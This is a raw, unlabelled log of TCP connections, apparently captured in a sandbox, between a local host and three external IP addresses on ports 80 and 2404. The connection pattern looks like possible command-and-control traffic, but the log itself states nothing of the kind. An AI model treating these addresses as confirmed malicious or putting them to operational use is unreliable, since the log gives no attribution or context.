Oct 13, 2024 07:29:00.266774893 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266776085 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266798973 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266809940 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266815901 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266841888 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266859055 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266875982 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266880989 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266907930 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266923904 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266941071 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266949892 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.266979933 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.266993046 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267013073 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267029047 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267045975 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267054081 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267079115 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267093897 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267116070 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267124891 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267163038 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267220020 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267251968 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267271996 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267283916 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267292976 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267317057 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267332077 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267350912 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267362118 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267407894 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267411947 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267466068 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267599106 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267632008 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267649889 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267663956 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267676115 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267697096 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267714024 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267729998 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267744064 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267764091 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267779112 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267797947 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267810106 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267829895 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267848015 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267865896 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.267878056 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.267915010 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.272556067 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:01.309113026 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:03.793637991 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:03.799016953 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:03.799078941 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:03.806979895 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:03.811851025 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:04.321774960 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:04.453154087 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:04.453432083 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:04.458422899 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:04.463848114 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:04.463916063 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:04.469496012 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:04.646239042 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:04.648566961 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:04.653536081 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:04.776859999 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:04.900700092 CEST	49163	80	192.168.2.22	178.237.33.50
Oct 13, 2024 07:29:04.905725956 CEST	80	49163	178.237.33.50	192.168.2.22
Oct 13, 2024 07:29:04.905796051 CEST	49163	80	192.168.2.22	178.237.33.50
Oct 13, 2024 07:29:04.906090975 CEST	49163	80	192.168.2.22	178.237.33.50
Oct 13, 2024 07:29:04.909533024 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:04.909595013 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:04.910962105 CEST	80	49163	178.237.33.50	192.168.2.22
Oct 13, 2024 07:29:04.912239075 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:04.917155027 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:04.917222977 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:04.920212984 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:04.925208092 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.537678003 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.537712097 CEST	80	49163	178.237.33.50	192.168.2.22
Oct 13, 2024 07:29:05.537882090 CEST	49163	80	192.168.2.22	178.237.33.50
Oct 13, 2024 07:29:05.545433044 CEST	49162	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.550575018 CEST	2404	49162	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.554783106 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.555031061 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.559055090 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.563847065 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.563911915 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.568723917 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.741555929 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.741614103 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.741648912 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.741681099 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.741688967 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.741714954 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.741749048 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.741776943 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.741782904 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.741816998 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.741849899 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.741863966 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.741894007 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.742013931 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.742048025 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.742064953 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.746818066 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.749180079 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.750907898 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.831763029 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.831820011 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.831850052 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.831897020 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.831914902 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.831929922 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.831991911 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.832216024 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.832247019 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.832278013 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.832304955 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.832571030 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.832617998 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.832626104 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.832649946 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.832680941 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.832696915 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.833159924 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.833260059 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.833275080 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.833292007 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.833343983 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.833345890 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.833375931 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.833600998 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.834114075 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.834146023 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.834177971 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.834182024 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.834211111 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.834228039 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.834244013 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.834287882 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.834893942 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.834963083 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.834994078 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.835009098 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.836405993 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.836855888 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.836884022 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.836941957 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.922586918 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.922640085 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.922671080 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.922696114 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.922741890 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.922775030 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.922811031 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.922862053 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.922893047 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.922928095 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923079014 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.923079967 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.923168898 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923218966 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923249960 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923280954 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923304081 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.923314095 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923346043 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923420906 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923434973 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.923572063 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923604012 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923630953 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.923652887 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923683882 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923710108 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.923716068 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923760891 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.923930883 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.923984051 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924015045 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924036026 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.924046040 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924093008 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924102068 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.924345970 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924376965 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924401045 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.924407959 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924441099 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924472094 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924488068 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.924504995 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924536943 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924556971 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.924628973 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924659967 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924680948 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.924947977 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.924976110 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.924978971 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.925013065 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.925024986 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.925174952 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.925206900 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.925229073 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.925237894 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.925271034 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.925301075 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.925350904 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.925399065 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.925405025 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.925431013 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.925462008 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.925482035 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.925493956 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.925529957 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.925578117 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.927099943 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.963028908 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.963073969 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.963109016 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.963146925 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:05.963239908 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:05.963239908 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.017426014 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.017642021 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.017673016 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.017707109 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.017731905 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.017756939 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.017788887 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.017797947 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.017822981 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.017853975 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.017879009 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.017887115 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.017919064 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.017949104 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.017965078 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.017982960 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018017054 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018049955 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018065929 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.018084049 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018121004 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018132925 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.018263102 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018294096 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018309116 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.018326998 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018358946 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018371105 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.018640041 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018671989 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018703938 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018718004 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.018735886 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018769026 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018800020 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018812895 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.018831968 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018863916 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018896103 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018897057 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.018930912 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.018971920 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.019207001 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019257069 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019289017 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019323111 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019335032 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.019373894 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019431114 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019512892 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019527912 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.019546986 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019593000 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019598007 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.019834042 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019865990 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019889116 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.019898891 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019929886 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019951105 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.019962072 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.019994020 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020008087 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.020025969 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020057917 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020075083 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.020087957 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020121098 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020138025 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.020162106 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020205975 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.020505905 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020535946 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.020538092 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020570040 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020601988 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020622015 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.020632982 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020665884 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020697117 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020711899 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.020729065 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.020781040 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.023199081 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.023230076 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.023262024 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.023278952 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.024122000 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024172068 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024174929 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.024204016 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024235964 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024251938 CEST	49164	2404	192.168.2.22	107.173.4.16
Oct 13, 2024 07:29:06.024269104 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024300098 CEST	2404	49164	107.173.4.16	192.168.2.22
Oct 13, 2024 07:29:06.024318933 CEST	49164	2404	192.168.2.22	107.173.4.16
